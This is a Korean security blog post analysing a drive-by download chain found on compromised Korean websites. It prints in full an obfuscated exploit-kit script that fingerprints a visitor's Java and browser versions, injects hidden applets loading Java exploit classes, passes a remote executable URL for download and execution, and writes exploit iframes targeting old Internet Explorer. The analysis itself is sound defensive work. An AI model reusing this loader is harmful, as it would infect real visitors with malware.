http://kids.woorisoop.org/kids/css/kids.js
→http://www.marieclairekorea.com/user/pop/pop_photot.html
→http://www.rootmand.com/hndex/index.html (JSXX 0.44 VIP)
→http://www.rootmand.com/hndex/swfobject.js
→http://www.rootmand.com/hndex/jpg.js
var XzAWBt8=navigator.userAgent.toLowerCase();
var kuAyQq8="1"+"1"+"1";
if(document.cookie.indexOf("pCRvCM5=")==-1 && XzAWBt8.indexOf("linux")<=-1 && XzAWBt8.indexOf("bot")==-1 && XzAWBt8.indexOf("spider")==-1)
{
var rPTjUMk8=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
kuAyQq8="0";
document.cookie="pCRvCM5=Yes;path=/;expires="+expires.toGMTString();
iJFTc5="1";
delete iJFTc5;
try
{
iJFTc5+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";
}
catch(e)
{
var pDQnnGf7="1";
czsI0 = eval
}
nzERs1=unescape;
lfNx6="[생략]0C";
fjKju8="function XDMYi7(){jdEeR1=Math.PI;byfSvL0=Math.tan;wUTlxW5=parseInt;PUJFl7='length';voMP6='test';WVAnR7='replace';HipSKp8=wUTlxW5(~((jdEeR1&jdEeR1)|(~jdEeR1&jdEeR1)&(jdEeR1&~jdEeR1)|(~jdEeR1&~jdEeR1)));vzln1=wUTlxW5(((HipSKp8&HipSKp8)|(~HipSKp8&HipSKp8)&(HipSKp8&~HipSKp8)|(~HipSKp8&~HipSKp8))&1);/*Encrypt By www.sunshinem.com's JSXX 0.44 VIP*/qdDV3=vzln1<<vzln1;new function(){CbNxM1=czsI0('1Qe4dG*]6zY^k8vb]#&,m8$[x_GD3a]Nj5dsn7[F[8cu[S34Rlc]4r;idpDt='[WVAnR7](/[^v@0el9a]/g,''));[생략]('ere');}}";WEsQg5 = czsI0(czsI0);WEsQg5(fjKju8);
}
byfSvL0=CbNxM1;rsIlD3=CqsL5(20100418);while(window.closed){}document.write("<br>");
var gondady=document.createElement('body');
document.body.appendChild(gondady);
var gondadx=deployJava.getJREs()+"";
var arrx=gondadx.split(",");
gondadx=parseInt(arrx[0].replace(/\.|\_/g,''));
for(i=1;i<arrx.length;i++)
{
tmp=parseInt(arrx[i].replace(/\.|\_/g,''));
if (gondadx<tmp) gondadx=tmp;
}
if ((gondadx<=17007 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))
{
var gondad = document.createElement('applet');
gondad.width="1";
gondad.height="1";
if((gondadx<=16027 && gondadx>=16000) || (gondadx>=15000 && gondadx<=15031))
{
gondad.archive="QWhYkvj4.jpg";
gondad.code="GondadGondadExp.class";
gondad.setAttribute("dota","http://www.sunshinem.com/kor/wow.exe");
document.body.appendChild(gondad);
}
else if ((gondadx<=17002 && gondadx>=17000) || (gondadx<=16030 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))
{
gondad.archive="paHvWdd2.jpg";
gondad.code="GondadExx.Ohno.class";
gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");
gondad.setAttribute("bn","woyouyizhixiaomaolv");
gondad.setAttribute("si","conglaiyebuqi");
gondad.setAttribute("bs","748");
document.body.appendChild(gondad);
}
else if ((gondadx<=17003 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15032 && gondadx>=15000))
{
gondad.archive="IFoESa4.jpg";
gondad.code="gond1723.Gondattack.class";
gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");
gondad.setAttribute("bn","woyouyizhixiaomaolv");
gondad.setAttribute("si","conglaiyebuqi");
gondad.setAttribute("bs","748");
document.body.appendChild(gondad);
}
else if (gondadx<=17006 && gondadx>=17000)
{
var HXjpkN2 = window.navigator.userAgent.toLowerCase();
if (HXjpkN2.indexOf('msie 6') > -1)
{
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.sunshinem.com/kor/wow.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'qccs2.jpg'></OBJECT>");
}
else
{
gondad.archive="qccs2.jpg";
gondad.code="cve2012xxxx.Gondvv.class";
gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");
gondad.setAttribute("bn","woyouyizhixiaomaolv");
gondad.setAttribute("si","conglaiyebuqi");
gondad.setAttribute("bs","748");
document.body.appendChild(gondad);
}
}
else if (gondadx<=17007 && gondadx>=17000)
{
var HXjpkN2 = window.navigator.userAgent.toLowerCase();
if (HXjpkN2.indexOf('msie 6') > -1)
{
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.sunshinem.com/kor/wow.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gond20125076.Gondqq.class'><param name=archive value= 'dkVlU7.jpg'></OBJECT>");
}
else
{
gondad.archive="dkVlU7.jpg";
gondad.code="gond20125076.Gondqq.class";
gondad.setAttribute("xiaomaolv","http://www.sunshinem.com/kor/wow.exe");
gondad.setAttribute("bn","woyouyizhixiaomaolv");
gondad.setAttribute("si","conglaiyebuqi");
gondad.setAttribute("bs","748");
document.body.appendChild(gondad);
}
}
}
else {
/*
if(rPTjUMk8['major']==11 && rPTjUMk8['minor']<=3 && rPTjUMk8['rev']<=300 && rPTjUMk8['gondad']<= 270){
document.writeln("<img src=jmnI1.swf><\/img>");
setTimeout("document.writeln(\"<embed width=100 height=0 src=jmnI1.swf><\\/embed>\");",2000);
}
else{
*/
var HXjpkN2 = window.navigator.userAgent.toLowerCase();
if ((HXjpkN2.indexOf('msie 6') > -1)||(HXjpkN2.indexOf('msie 7') > -1)) {
document.writeln("<iframe src=rpdTtS8.html><\/iframe>");
}
else if((HXjpkN2.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 5.1') > -1) && (navigator.browserLanguage.indexOf('ko') > -1)){
document.writeln("<iframe src=QWhYkvj4.html><\/iframe>");
}
//}
}
스크립트를 보면서 궁금했던 점이 바로 Delete 의 역활이었다.
Delete의 역활을 중간에 임의의 코드나 실행 방해를 할줄 알았는데 그게 아니었다!
http://happybruce.tistory.com/973 블로그에 나온
Delete 의 역활을 적어본다!
1. var 로 선언된 변수는 삭제 할 수 없습니다.
2. 사용자가 생성한 객체 및 객체 속성은 삭제 할 수 있으나 내부 객체 , 내부 객체의 속성 들은
삭제 할 수 없습니다.
이와 같이 Delete는 아무것도 아닌 역활을 하는것이었다!
하지만 스크립트 상의 임의의 키값이나 내에 코드값을 임의의 수로 변경시킨다면
ÚÒÆÇøGÙøÐ#ÇéqÌêÚ>×ág»ªÒ¶×²xÍÑZzÁÑRÖSù RôâÎ ¾ÂÓÁ¶Û¡¶ÒÃ׿ÐÎÖÜÚÒËðÎÿÒм¯Ø!Ðò(̶ïy
이와 같이 알수없는 문자로 나오니 조심하자!
마지막으로 궁금점에 대해 답해주신 JJoon 님께 감사하다는 말을 덧붙이고 싶다!
항상 JSXX 0.44 VIP 보면서 키값을 연산하여서 했었는데 이번에 새로 알게된것도 있어서 너무 좋다!
골칫덩러리를 해결한거 같아서!
나도 도움을 받는게 아니라 도움을 주는날도 언젠간 오겠지??
'security > 악성코드 유포' 카테고리의 다른 글
| Exploit:JS/Blacole.KH (Microsoft) (0) | 2013.02.14 |
|---|---|
| HEX 값으로 유포하는 악성 Iframe Script (0) | 2013.01.24 |
| 음반사이트 → http://www.leesmusic.co.kr (리스뮤직) 악성스크립트 유포중! (0) | 2012.12.08 |
| 구인 사이트 교차로 → http://www.icross.co.kr Yszz 0.11 vip 악성 스크립트 유포중!! (0) | 2012.11.03 |
| 중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!! (0) | 2012.11.02 |